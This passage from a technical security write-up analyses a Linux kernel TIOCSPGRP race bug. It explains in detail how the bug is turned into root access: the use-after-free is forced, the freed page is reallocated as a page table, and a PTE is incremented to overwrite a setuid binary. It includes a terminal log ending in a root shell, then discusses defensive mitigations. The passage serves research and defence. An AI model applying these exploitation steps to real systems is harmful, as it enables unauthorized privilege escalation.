In this section, I will first walk through how my exploit works; afterwards I will discuss different defensive techniques that target these attack stages.

Attack stage: Freeing the object with multiple dangling references

This bug allows us to probabilistically skew the refcount of a struct pid down, depending on which way the race happens: We can run colliding TIOCSPGRP calls from two threads repeatedly, and from time to time that will mess up the refcount. But we don't immediately know how many times the refcount skew has actually happened.

What we'd really want as an attacker is a way to skew the refcount deterministically. We'll have to somehow compensate for our lack of information about whether the refcount was skewed successfully. We could try to somehow make the race deterministic (seems difficult), or after each attempt to skew the refcount assume that the race worked and run the rest of the exploit (since if we didn't skew the refcount, the initial memory corruption is gone, and nothing bad will happen), or we can attempt to find an information leak that lets us figure out the state of the reference count.

On typical desktop/server distributions, the following approach works (unreliably, depending on RAM size) for setting up a freed struct pid with multiple dangling references:

  1. Allocate a new struct pid (by creating a new task).
  2. Create a large number of references to it (by sending messages with SCM_CREDENTIALS to unix domain sockets, and leaving those messages queued up).
  3. Repeatedly trigger the TIOCSPGRP race to skew the reference count downwards, with the number of attempts chosen such that we expect that the resulting refcount skew is bigger than the number of references we need for the rest of our attack, but smaller than the number of extra references we created.
  4. Let the task owning the pid exit and die, and wait for RCU (read-copy-update, a mechanism that involves delaying the freeing of some objects) to settle such that the task's reference to the pid is gone. (Waiting for an RCU grace period from userspace is not a primitive that is intentionally exposed through the UAPI, but there are various ways userspace can do it - e.g. by testing when a released BPF program's memory is subtracted from memory accounting, or by abusing the membarrier(MEMBARRIER_CMD_GLOBAL, ...) syscall after the kernel version where RCU flavors were unified.)
  5. Create a new thread, and let that thread attempt to drop all the references we created.

Because the refcount is smaller at the start of step 5 than the number of references we are about to drop, the pid will be freed at some point during step 5; the next attempt to drop a reference will cause a use-after-free:

struct upid {
int nr;
struct pid_namespace *ns;
};

struct pid
{
atomic_t count;
unsigned int level;
/* lists of tasks that use this pid */
struct hlist_head tasks[PIDTYPE_MAX];
struct rcu_head rcu;
struct upid numbers[1];
};
[...]
void put_pid(struct pid *pid)
{
struct pid_namespace *ns;

if (!pid)
return;

ns = pid->numbers[pid->level].ns;
if ((atomic_read(&pid->count) == 1) ||
atomic_dec_and_test(&pid->count)) {
kmem_cache_free(ns->pid_cachep, pid);
put_pid_ns(ns);
}
}

When the object is freed, the SLUB allocator normally replaces the first 8 bytes (sidenote: a different position is chosen starting in 5.7, see Kees' blog) of the freed object with an XOR-obfuscated freelist pointer; therefore, the count and level fields are now effectively random garbage. This means that the load from pid->numbers[pid->level] will now be at some random offset from the pid, in the range from zero to 64 GiB. As long as the machine doesn't have tons of RAM, this will likely cause a kernel segmentation fault. (Yes, I know, that's an absolutely gross and unreliable way to exploit this. It mostly works though, and I only noticed this issue when I already had the whole thing written, so I didn't really want to go back and change it... plus, did I mention that it mostly works?)

Linux in its default configuration, and the configuration shipped by most general-purpose distributions, attempts to fix up unexpected kernel page faults and other types of "oopses" by killing only the crashing thread. Therefore, this kernel page fault is actually useful for us as a signal: Once the thread has died, we know that the object has been freed, and can continue with the rest of the exploit.

If this code looked a bit differently and we were actually reaching a double-free, the SLUB allocator would also detect that and trigger a kernel oops (see set_freepointer() for the CONFIG_SLAB_FREELIST_HARDENED case).

Discarded attack idea: Directly exploiting the UAF at the SLUB level

On the Debian kernel I was looking at, a struct pid in the initial namespace is allocated from the same kmem_cache as struct seq_file and struct epitem - these three slabs have been merged into one by find_mergeable() to reduce memory fragmentation, since their object sizes, alignment requirements, and flags match:

[email protected]:/sys/kernel/slab# ls -l pid
lrwxrwxrwx 1 root root 0 Feb 6 00:09 pid -> :A-0000128
[email protected]:/sys/kernel/slab# ls -l | grep :A-0000128
drwxr-xr-x 2 root root 0 Feb 6 00:09 :A-0000128
lrwxrwxrwx 1 root root 0 Feb 6 00:09 eventpoll_epi -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb 6 00:09 pid -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb 6 00:09 seq_file -> :A-0000128
[email protected]:/sys/kernel/slab#

A straightforward way to exploit a dangling reference to a SLUB object is to reallocate the object through the same kmem_cache it came from, without ever letting the page reach the page allocator. To figure out whether it's easy to exploit this bug this way, I made a table listing which fields appear at each offset in these three data structures (using pahole -E --hex -C <typename> <path to vmlinux debug info>):

offset pid eventpoll_epi / epitem (RCU-freed) seq_file
0x00 count.counter (4) (CONTROL) rbn.__rb_parent_color (8) (TARGET?) buf (8) (TARGET?)
0x04 level (4)
0x08 tasks[PIDTYPE_PID] (8) rbn.rb_right (8) / rcu.func (8) size (8)
0x10 tasks[PIDTYPE_TGID] (8) rbn.rb_left (8) from (8)
0x18 tasks[PIDTYPE_PGID] (8) rdllink.next (8) count (8)
0x20 tasks[PIDTYPE_SID] (8) rdllink.prev (8) pad_until (8)
0x28 rcu.next (8) next (8) index (8)
0x30 rcu.func (8) ffd.file (8) read_pos (8)
0x38 numbers[0].nr (4) ffd.fd (4) version (8)
0x3c [hole] (4) nwait (4)
0x40 numbers[0].ns (8) pwqlist.next (8) lock (0x20): counter (8)
0x48 --- pwqlist.prev (8)
0x50 --- ep (8)
0x58 --- fllink.next (8)
0x60 --- fllink.prev (8) op (8)
0x68 --- ws (8) poll_event (4)
0x6c --- [hole] (4)
0x70 --- event.events (4) file (8)
0x74 --- event.data (8) (CONTROL)
0x78 --- private (8) (TARGET?)
0x7c --- ---
0x80 --- --- ---

In this case, reallocating the object as one of those three types didn't seem to me like a nice way forward (although it should be possible to exploit this somehow with some effort, e.g. by using count.counter to corrupt the buf field of seq_file). Also, some systems might be using the slab_nomerge kernel command line flag, which disables this merging behavior.

Another approach that I didn't look into here would have been to try to corrupt the obfuscated SLUB freelist pointer (obfuscation is implemented in freelist_ptr()); but since that stores the pointer in big-endian, count.counter would only effectively let us corrupt the more significant half of the pointer, which would probably be a pain to exploit.

Attack stage: Freeing the object's page to the page allocator

This section will refer to some internals of the SLUB allocator; if you aren't familiar with those, you may want to at least look at slides 2-4 and 13-14 of Christoph Lameter's slab allocator overview talk from 2014. (Note that that talk covers three different allocators; the SLUB allocator is what most systems use nowadays.)

The alternative to exploiting the UAF at the SLUB allocator level is to flush the page out to the page allocator (also called the buddy allocator), which is the last level of dynamic memory allocation on Linux (once the system is far enough into the boot process that the memblock allocator is no longer used). From there, the page can theoretically end up in pretty much any context. We can flush the page out to the page allocator with the following steps:

  1. Instruct the kernel to pin our task to a single CPU. Both SLUB and the page allocator use per-cpu structures; so if the kernel migrates us to a different CPU in the middle, we would fail.
  2. Before allocating the victim struct pid whose refcount will be corrupted, allocate a large number of objects to drain partially-free slab pages of all their unallocated objects. If the victim object (which will be allocated in step 5 below) landed in a page that is already partially used at this point, we wouldn't be able to free that page.
  3. Allocate around objs_per_slab * (1+cpu_partial) objects - in other words, a set of objects that completely fill at least cpu_partial pages, where cpu_partial is the maximum length of the "percpu partial list". Those newly allocated pages that are completely filled with objects are not referenced by SLUB's freelists at this point because SLUB only tracks pages with free objects on its freelists.
  4. Fill objs_per_slab-1 more objects, such that at the end of this step, the "CPU slab" (the page from which allocations will be served first) will not contain anything other than free space and fresh allocations (created in this step).
  5. Allocate the victim object (a struct pid). The victim page (the page from which the victim object came) will usually be the CPU slab from step 4, but if step 4 completely filled the CPU slab, the victim page might also be a new, freshly allocated CPU slab.
  6. Trigger the bug on the victim object to create an uncounted reference, and free the object.
  7. Allocate objs_per_slab+1 more objects. After this, the victim page will be completely filled with allocations from steps 4 and 7, and it won't be the CPU slab anymore (because the last allocation can not have fit into the victim page).
  8. Free all allocations from steps 4 and 7. This causes the victim page to become empty, but does not free the page; the victim page is placed on the percpu partial list once a single object from that page has been freed, and then stays on that list.
  9. Free one object per page from the allocations from step 3. This adds all these pages to the percpu partial list until it reaches the limit cpu_partial, at which point it will be flushed: Pages containing some in-use objects are placed on SLUB's per-NUMA-node partial list, and pages that are completely empty are freed back to the page allocator. (We don't free all allocations from step 3 because we only want the victim page to be freed to the page allocator.) Note that this step requires that every objs_per_slab-th object the allocator gave us in step 3 is on a different page.

When the page is given to the page allocator, we benefit from the page being order-0 (4 KiB, native page size): For order-0 pages, the page allocator has special freelists, one per CPU+zone+migratetype combination. Pages on these freelists are not normally accessed from other CPUs, and they don't immediately get combined with adjacent free pages to form higher-order free pages.

At this point we are able to perform use-after-free accesses to some offset inside the free victim page, using codepaths that interpret part of the victim page as a struct pid. Note that at this point, we still don't know exactly at which offset inside the victim page the victim object is located.

Attack stage: Reallocating the victim page as a pagetable

At the point where the victim page has reached the page allocator's freelist, it's essentially game over - at this point, the page can be reused as anything in the system, giving us a broad range of options for exploitation. In my opinion, most defences that act after we've reached this point are fairly unreliable.

One type of allocation that is directly served from the page allocator and has nice properties for exploitation are page tables (which have also been used to exploit Rowhammer). One way to abuse the ability to modify a page table would be to enable the read/write bit in a page table entry (PTE) that maps a file page to which we are only supposed to have read access - for example, this could be used to gain write access to part of a setuid binary's .text segment and overwrite it with malicious code.

We don't know at which offset inside the victim page the victim object is located; but since a page table is effectively an array of 8-byte-aligned elements of size 8 and the victim object's alignment is a multiple of that, as long as we spray all elements of the victim array, we don't need to know the victim object's offset.

To allocate a page table full of PTEs mapping the same file page, we have to:

  • prepare by setting up a 2MiB-aligned memory region (because each last-level page table describes 2MiB of virtual memory) containing single-page mmap() mappings of the same file page (meaning each mapping corresponds to one PTE); then
  • trigger allocation of the page table and fill it with PTEs by reading from each mapping

struct pid has the same alignment as a PTE, and it starts with a 32-bit refcount, so that refcount is guaranteed to overlap the first half of a PTE, which is 64-bit. Because X86 CPUs are little-endian, incrementing the refcount field in the freed struct pid increments the least significant half of the PTE - so it effectively increments the PTE. (Except for the edge case where the least significant half is 0xffffffff, but that's not the case here.)

struct pid: count | level |   tasks[0]  |   tasks[1]  |   tasks[2]  | ... 
pagetable: PTE | PTE | PTE | PTE | ...

Therefore we can increment one of the PTEs by repeatedly triggering get_pid(), which tries to increment the refcount of the freed object. This can be turned into the ability to write to the file page as follows:

  • Increment the PTE by 0x42 to set the Read/Write bit and the Dirty bit. (If we didn't set the Dirty bit, the CPU would do it by itself when we write to the corresponding virtual address, so we could also just increment by 0x2 here.)
  • For each mapping, attempt to overwrite its contents with malicious data and ignore page faults.
    • This might throw spurious errors because of outdated TLB entries, but taking a page fault will automatically evict such TLB entries, so if we just attempt the write twice, this can't happen on the second write (modulo CPU migration, as mentioned above).
    • One easy way to ignore page faults is to let the kernel perform the memory write using pread(), which will return -EFAULT on fault.

If the kernel notices the Dirty bit later on, that might trigger writeback, which could crash the kernel if the mapping isn't set up for writing. Therefore, we have to reset the Dirty bit. We can't reliably decrement the PTE because put_pid() inefficiently accesses pid->numbers[pid->level] even when the refcount isn't dropping to zero, but we can increment it by an additional 0x80-0x42=0x3e, which means the final value of the PTE, compared to the initial value, will just have the additional bit 0x80 set, which the kernel ignores.

Afterwards, we launch the setuid executable (which, in the version in the pagecache, now contains the code we injected), and gain root privileges:

[email protected]:~/tiocspgrp$ make
as -o rootshell.o rootshell.S
ld -o rootshell rootshell.o --nmagic
gcc -Wall -o poc poc.c
[email protected]:~/tiocspgrp$ ./poc
starting up...
executing in first level child process, setting up session and PTY pair...
setting up unix sockets for ucreds spam...
draining pcpu and node partial pages
preparing for flushing pcpu partial pages
launching child process
child is 1448
ucreds spam done, struct pid refcount should be lifted. starting to skew refcount...
refcount should now be skewed, child exiting
child exited cleanly
waiting for RCU call...
bpf load with rlim 0x0: -1 (Operation not permitted)
bpf load with rlim 0x1000: 452 (Success)
bpf load success with rlim 0x1000: got fd 452
....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
RCU callbacks executed
gonna try to free the pid...
double-free child died with signal 9 after dropping 9990 references (99%)
hopefully reallocated as an L1 pagetable now
PTE forcibly marked WRITE | DIRTY (hopefully)
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
bash: cannot set terminal process group (1447): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/home/user/tiocspgrp# id
uid=0(root) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner),120(wireshark)
[email protected]:/home/user/tiocspgrp#

Note that nothing in this whole exploit requires us to leak any kernel-virtual or physical addresses, partly because we have an increment primitive instead of a plain write; and it also doesn't involve directly influencing the instruction pointer.

Defence

This section describes different ways in which this exploit could perhaps have been prevented from working. To assist the reader, the titles of some of the subsections refer back to specific exploit stages from the section above.

Against bugs being reachable: Attack surface reduction

A potential first line of defense against many kernel security issues is to only make kernel subsystems available to code that needs access to them. If an attacker does not have direct access to a vulnerable subsystem and doesn't have sufficient influence over a system component with access to make it trigger the issue, the issue is effectively unexploitable from the attacker's security context.

Pseudoterminals are (more or less) only necessary for interactively serving users who have shell access (or something resembling that), including:

  • terminal emulators inside graphical user sessions
  • SSH servers
  • screen sessions started from various types of terminals

Things like webservers or phone apps won't normally need access to such devices; but there are exceptions. For example:

  • a web server is used to provide a remote root shell for system administration
  • a phone app's purpose is to make a shell available to the user
  • a shell script uses expect to interact with a binary that requires a terminal for input/output

In my opinion, the biggest limits on attack surface reduction as a defensive strategy are:

  1. It exposes a workaround to an implementation concern of the kernel (potential memory safety issues) in user-facing API, which can lead to compatibility issues and maintenance overhead - for example, from a security standpoint, I think it might be a good idea to require phone apps and systemd services to declare their intention to use the PTY subsystem at install time, but that would be an API change requiring some sort of action from application authors, creating friction that wouldn't be necessary if we were confident that the kernel is working properly. This might get especially messy in the case of software that invokes external binaries depending on configuration, e.g. a web server that needs PTY access when it is used for server administration. (This is somewhat less complicated when a benign-but-potentially-exploitable application actively applies restrictions to itself; but not every application author is necessarily willing to design a fine-grained sandbox for their code, and even then, there may be compatibility issues caused by libraries outside the application author's control.)
  2. It can't protect a subsystem from a context that fundamentally needs access to it. (E.g. Android's /dev/binder is directly accessible by Chrome renderers on Android because they have Android code running inside them.)
  3. It means that decisions that ought to not influence the security of a system (making an API that does not grant extra privileges available to some potentially-untrusted context) essentially involve a security tradeoff.

Still, in practice, I believe that attack surface reduction mechanisms (especially seccomp) are currently some of the most important defense mechanisms on Linux.

Against bugs in source code: Compile-time locking validation

The bug in TIOCSPGRP was a fairly straightforward violation of a straightforward locking rule: While a tty_struct is live, accessing its pgrp member is forbidden unless the ctrl_lock of the same tty_struct is held. This rule is sufficiently simple that it wouldn't be entirely unreasonable to expect the compiler to be able to verify it - as long as you somehow inform the compiler about this rule, because figuring out the intended locking rules just from looking at a piece of code can often be hard even for humans (especially when some of the code is incorrect).

When you are starting a new project from scratch, the overall best way to approach this is to use a memory-safe language - in other words, a language that has explicitly been designed such that the programmer has to provide the compiler with enough information about intended memory safety semantics that the compiler can automatically verify them. But for existing codebases, it might be worth looking into how much of this can be retrofitted.

Clang's Thread Safety Analysis feature does something vaguely like what we'd need to verify the locking in this situation:

$ nl -ba -s' ' thread-safety-test.cpp | sed 's|^   ||'
1 struct __attribute__((capability("mutex"))) mutex {
2 };
3
4 void lock_mutex(struct mutex *p) __attribute__((acquire_capability(*p)));
5 void unlock_mutex(struct mutex *p) __attribute__((release_capability(*p)));
6
7 struct foo {
8 int a __attribute__((guarded_by(mutex)));
9 struct mutex mutex;
10 };
11
12 int good(struct foo *p1, struct foo *p2) {
13 lock_mutex(&p1->mutex);
14 int result = p1->a;
15 unlock_mutex(&p1->mutex);
16 return result;
17 }
18
19 int bogus(struct foo *p1, struct foo *p2) {
20 lock_mutex(&p1->mutex);
21 int result = p2->a;
22 unlock_mutex(&p1->mutex);
23 return result;
24 }
$ clang++ -c -o thread-safety-test.o thread-safety-test.cpp -Wall -Wthread-safety
thread-safety-test.cpp:21:22: warning: reading variable 'a' requires holding mutex 'p2->mutex' [-Wthread-safety-precise]
int result = p2->a;
^
thread-safety-test.cpp:21:22: note: found near match 'p1->mutex'
1 warning generated.
$

However, this does not currently work when compiling as C code because the guarded_by attribute can't find the other struct member; it seems to have been designed mostly for use in C++ code. A more fundamental problem is that it also doesn't appear to have built-in support for distinguishing the different rules for accessing a struct member depending on the lifetime state of the object. For example, almost all objects with locked members will have initialization/destruction functions that have exclusive access to the entire object and can access members without locking. (The lock might not even be initialized in those states.)

Some objects also have more lifetime states; in particular, for many objects with RCU-managed lifetime, only a subset of the members may be accessed through an RCU reference without having upgraded the reference to a refcounted one beforehand. Perhaps this could be addressed by introducing a new type attribute that can be used to mark pointers to structs in special lifetime states? (For C++ code, Clang's Thread Safety Analysis simply disables all checks in all constructor/destructor functions.)

I am hopeful that, with some extensions, something vaguely like Clang's Thread Safety Analysis could be used to retrofit some level of compile-time safety against unintended data races. This will require adding a lot of annotations, in particular to headers, to document intended locking semantics; but such annotations are probably anyway necessary to enable productive work on a complex codebase. In my experience, when there are no detailed comments/annotations on locking rules, every attempt to change a piece of code you're not intimately familiar with (without introducing horrible memory safety bugs) turns into a foray into the thicket of the surrounding call graphs, trying to unravel the intentions behind the code.

The one big downside is that this requires getting the development community for the codebase on board with the idea of backfilling and maintaining such annotations. And someone has to write the analysis tooling that can verify the annotations.

At the moment, the Linux kernel does have some very coarse locking validation via sparse; but this infrastructure is not capable of detecting situations where the wrong lock is used or validating that a struct member is protected by a lock. It also can't properly deal with things like conditional locking, which makes it hard to use for anything other than spinlocks/RCU. The kernel's runtime locking validation via LOCKDEP is more advanced, but mostly with a focus on locking correctness of RCU pointers as well as deadlock detection (the main focus); again, there is no mechanism to, for example,automatically validate that a given struct member is only accessed under a specific lock (which would probably also be quite costly to implement with runtime validation). Also, as a runtime validation mechanism, it can't discover errors in code that isn't executed during testing (although it can combine separately observed behavior into race scenarios without ever actually observing the race).

Against bugs in source code: Global static locking analysis

An alternative approach to checking memory safety rules at compile time is to do it either after the entire codebase has been compiled, or with an external tool that analyzes the entire codebase. This allows the analysis tooling to perform analysis across compilation units, reducing the amount of information that needs to be made explicit in headers. This may be a more viable approach if peppering annotations everywhere across headers isn't viable; but it also reduces the utility to human readers of the code, unless the inferred semantics are made visible to them through some special code viewer. It might also be less ergonomic in the long run if changes to one part of the kernel could make the verification of other parts fail - especially if those failures only show up in some configurations.

I think global static analysis is probably a good tool for finding some subsets of bugs, and it might also help with finding the worst-case depth of kernel stacks or proving the absence of deadlocks, but it's probably less suited for proving memory safety correctness?

Against exploit primitives: Attack primitive reduction via syscall restrictions

(Yes, I made up that name because I thought that capturing this under "Attack surface reduction" is too muddy.)

Because allocator fastpaths (both in SLUB and in the page allocator) are implemented using per-CPU data structures, the ease and reliability of exploits that want to coax the kernel's memory allocators into reallocating memory in specific ways can be improved if the attacker has fine-grained control over the assignment of exploit threads to CPU cores. I'm calling such a capability, which provides a way to facilitate exploitation by influencing relevant system state/behavior, an "attack primitive" here. Luckily for us, Linux allows tasks to pin themselves to specific CPU cores without requiring any privilege using the sched_setaffinity() syscall.

(As a different example, one primitive that can provide an attacker with fairly powerful capabilities is being able to indefinitely stall kernel faults on userspace addresses via FUSE or userfaultfd.)

Just like in the section "Attack surface reduction" above, an attacker's ability to use these primitives can be reduced by filtering syscalls; but while the mechanism and the compatibility concerns are similar, the rest is fairly different:

Attack primitive reduction does not normally reliably prevent a bug from being exploited; and an attacker will sometimes even be able to obtain a similar but shoddier (more complicated, less reliable, less generic, ...) primitive indirectly, for example:

Attack surface reduction is about limiting access to code that is suspected to contain exploitable bugs; in a codebase written in a memory-unsafe language, that tends to apply to pretty much the entire codebase. Attack surface reduction is often fairly opportunistic: You permit the things you need, and deny the rest by default.

Attack primitive reduction limits access to code that is suspected or known to provide (sometimes very specific) exploitation primitives. For example, one might decide to specifically forbid access to FUSE and userfaultfd for most code because of their utility for kernel exploitation, and, if one of those interfaces is truly needed, design a workaround that avoids exposing the attack primitive to userspace. This is different from attack surface reduction, where it often makes sense to permit access to any feature that a legitimate workload wants to use.

A nice example of an attack primitive reduction is the sysctl vm.unprivileged_userfaultfd, which was first introduced so that userfaultfd can be made completely inaccessible to normal users and was then later adjusted so that users can be granted access to part of its functionality without gaining the dangerous attack primitive. (But if you can create unprivileged user namespaces, you can still use FUSE to get an equivalent effect.)

When maintaining lists of allowed syscalls for a sandboxed system component, or something along those lines, it may be a good idea to explicitly track which syscalls are explicitly forbidden for attack primitive reduction reasons, or similarly strong reasons - otherwise one might accidentally end up permitting them in the future. (I guess that's kind of similar to issues that one can run into when maintaining ACLs...)

But like in the previous section, attack primitive reduction also tends to rely on making some functionality unavailable, and so it might not be viable in all situations. For example, newer versions of Android deliberately indirectly give apps access to FUSE through the AppFuse mechanism. (That API doesn't actually give an app direct access to /dev/fuse, but it does forward read/write requests to the app.)

Against oops-based oracles: Lockout or panic on crash

The ability to recover from kernel oopses in an exploit can help an attacker compensate for a lack of information about system state. Under some circumstances, it can even serve as a binary oracle that can be used to more or less perform a binary search for a value, or something like that.

(It used to be even worse on some distributions, where dmesg was accessible for unprivileged users; so if you managed to trigger an oops or WARN, you could then grab the register states at all IRET frames in the kernel stack, which could be used to leak things like kernel pointers. Luckily nowadays most distributions, including Ubuntu 20.10, restrict dmesg access.)

Android and Chrome OS nowadays set the kernel's panic_on_oops flag, meaning the machine will immediately restart when a kernel oops happens. This makes it hard to use oopsing as part of an exploit, and arguably also makes more sense from a reliability standpoint - the system will be down for a bit, and it will lose its existing state, but it will also reset into a known-good state instead of continuing in a potentially half-broken state, especially if the crashing thread was holding mutexes that can never again be released, or things like that. On the other hand, if some service crashes on a desktop system, perhaps that shouldn't cause the whole system to immediately go down and make you lose unsaved state - so panic_on_oops might be too drastic there.

A good solution to this might require a more fine-grained approach. (For example, grsecurity has for a long time had the ability to lock out specific UIDs that have caused crashes.) Perhaps it would make sense to allow the init daemon to use different policies for crashes in different services/sessions/UIDs?

Against UAF access: Deterministic UAF mitigation

One defense that would reliably stop an exploit for this issue would be a deterministic use-after-free mitigation. Such a mitigation would reliably protect the memory formerly occupied by the object from accesses through dangling pointers to the object, at least once the memory has been reused for a different purpose (including reuse to store heap metadata). For write operations, this probably requires either atomicity of the access check and the actual write or an RCU-like delayed freeing mechanism. For simple read operations, it can also be implemented by ordering the access check after the read, but before the read value is used.

A big downside of this approach on its own is that extra checks on every memory access will probably come with an extremely high efficiency penalty, especially if the mitigation can not make any assumptions about what kinds of parallel accesses might be happening to an object, or what semantics pointers have. (The proof-of-concept implementation I presented at LSSNA 2020 (slides, recording) had CPU overhead roughly in the range 60%-159% in kernel-heavy benchmarks, and ~8% for a very userspace-heavy benchmark.)

Unfortunately, even a deterministic use-after-free mitigation often won't be enough to deterministically limit the blast radius of something like a refcounting mistake to the object in which it occurred. Consider a case where two codepaths concurrently operate on the same object: Codepath A assumes that the object is live and subject to normal locking rules. Codepath B knows that the reference count reached zero, assumes that it therefore has exclusive access to the object (meaning all members are mutable without any locking requirements), and is trying to tear down the object. Codepath B might then start dropping references the object was holding on other objects while codepath A is following the same references. This could then lead to use-after-frees on pointed-to objects. If all data structures are subject to the same mitigation, this might not be too much of a problem; but if some data structures (like struct page) are not protected, it might permit a mitigation bypass.

Similar issues apply to data structures with union members that are used in different object states; for example, here's some random kernel data structure with an rcu_head in a union (just a random example, there isn't anything wrong with this code as far as I know):

struct allowedips_node {
struct wg_peer __rcu *peer;
struct allowedips_node __rcu *bit[2];
/* While it may seem scandalous that we waste space for v4,
* we're alloc'ing to the nearest power of 2 anyway, so this
* doesn't actually make a difference.
*/
u8 bits[16] __aligned(__alignof(u64));
u8 cidr, bit_at_a, bit_at_b, bitlen;

/* Keep rarely used list at bottom to be beyond cache line. */
union {
struct list_head peer_list;
struct rcu_head rcu;
};
};

As long as everything is working properly, the peer_list member is only used while the object is live, and the rcu member is only used after the object has been scheduled for delayed freeing; so this code is completely fine. But if a bug somehow caused the peer_list to be read after the rcu member has been initialized, type confusion would result.

In my opinion, this demonstrates that while UAF mitigations do have a lot of value (and would have reliably prevented exploitation of this specific bug), a use-after-free is just one possible consequence of the symptom class "object state confusion" (which may or may not be the same as the bug class of the root cause). It would be even better to enforce rules on object states, and ensure that an object e.g. can't be accessed through a "refcounted" reference anymore after the refcount has reached zero and has logically transitioned into a state like "non-RCU members are exclusively owned by thread performing teardown" or "RCU callback pending, non-RCU members are uninitialized" or "exclusive access to RCU-protected members granted to thread performing teardown, other members are uninitialized". Of course, doing this as a runtime mitigation would be even costlier and messier than a reliable UAF mitigation; this level of protection is probably only realistic with at least some level of annotations and static validation.

Against UAF access: Probabilistic UAF mitigation; pointer leaks

Summary: Some types of probabilistic UAF mitigation break if the attacker can leak information about pointer values; and information about pointer values easily leaks to userspace, e.g. through pointer comparisons in map/set-like structures.

If a deterministic UAF mitigation is too costly, an alternative is to do it probabilistically; for example, by tagging pointers with a small number of bits that are checked against object metadata on access, and then changing that object metadata when objects are freed.

The downside of this approach is that information leaks can be used to break the protection. One example of a type of information leak that I'd like to highlight (without any judgment on the relative importance of this compared to other types of information leaks) are intentional pointer comparisons, which have quite a few facets.

A relatively straightforward example where this could be an issue is the kcmp() syscall. This syscall compares two kernel objects using an arithmetic comparison of their permuted pointers (using a per-boot randomized permutation, see kptr_obfuscate()) and returns the result of the comparison (smaller, equal or greater). This gives userspace a way to order handles to kernel objects (e.g. file descriptors) based on the identities of those kernel objects (e.g. struct file instances), which in turn allows userspace to group a set of such handles by backing kernel object in O(n*log(n)) time using a standard sorting algorithm.

This syscall can be abused for improving the reliability of use-after-free exploits against some struct types because it checks whether two pointers to kernel objects are equal without accessing those objects: An attacker can allocate an object, somehow create a reference to the object that is not counted properly, free the object, reallocate it, and then verify whether the reallocation indeed reused the same address by comparing the dangling reference and a reference to the new object with kcmp(). If kcmp() includes the pointer's tag bits in the comparison, this would likely also permit breaking probabilistic UAF mitigations.

Essentially the same concern applies when a kernel pointer is encrypted and then given to userspace in fuse_lock_owner_id(), which encrypts the pointer to a files_struct with an open-coded version of XTEA before passing it to a FUSE daemon.

In both these cases, explicitly stripping tag bits would be an acceptable workaround because a pointer without tag bits still uniquely identifies a memory location; and given that these are very special interfaces that intentionally expose some degree of information about kernel pointers to userspace, it would be reasonable to adjust this code manually.

A somewhat more interesting example is the behavior of this piece of userspace code:

#define _GNU_SOURCE
#include <sys/epoll.h>
#include <sys/eventfd.h>
#include <sys/resource.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>

#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})

int main(void) {
struct rlimit rlim;
SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));
rlim.rlim_cur = rlim.rlim_max;
SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));

cpu_set_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(0, &cpuset);
SYSCHK(sched_setaffinity(0, sizeof(cpuset), &cpuset));

int epfd = SYSCHK(epoll_create1(0));
for (int i=0; i<1000; i++)
SYSCHK(eventfd(0, 0));
for (int i=0; i<192; i++) {
int fd = SYSCHK(eventfd(0, 0));
struct epoll_event event = {
.events = EPOLLIN,
.data = { .u64 = i }
};
SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event));
}

char cmd[100];
sprintf(cmd, "cat /proc/%d/fdinfo/%d", getpid(), epfd);
system(cmd);
}

It first creates a ton of eventfds that aren't used. Then it creates a bunch more eventfds and creates epoll watches for them, in creation order, with a monotonically incrementing counter in the "data" field. Afterwards, it asks the kernel to print the current state of the epoll instance, which comes with a list of all registered epoll watches, including the value of the data member (in hex). But how is this list sorted? Here's the result of running that code in a Ubuntu 20.10 VM (truncated, because it's a bit long):

[email protected]:~/epoll_fdinfo$ ./epoll_fdinfo 
pos: 0
flags: 02
mnt_id: 14
tfd: 1040 events: 19 data: 24 pos:0 ino:2f9a sdev:d
tfd: 1050 events: 19 data: 2e pos:0 ino:2f9a sdev:d
tfd: 1024 events: 19 data: 14 pos:0 ino:2f9a sdev:d
tfd: 1029 events: 19 data: 19 pos:0 ino:2f9a sdev:d
tfd: 1048 events: 19 data: 2c pos:0 ino:2f9a sdev:d
tfd: 1042 events: 19 data: 26 pos:0 ino:2f9a sdev:d
tfd: 1026 events: 19 data: 16 pos:0 ino:2f9a sdev:d
tfd: 1033 events: 19 data: 1d pos:0 ino:2f9a sdev:d
[...]

The data: field here is the loop index we stored in the .data member, formatted as hex. Here is the complete list of the data values in decimal:

36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19, 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110, 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10, 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118, 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81, 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160, 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

While these look sort of random, you can see that the list can be split into blocks of length 32 that consist of shuffled contiguous sequences of numbers:

Block 1 (32 values in range 19-50):
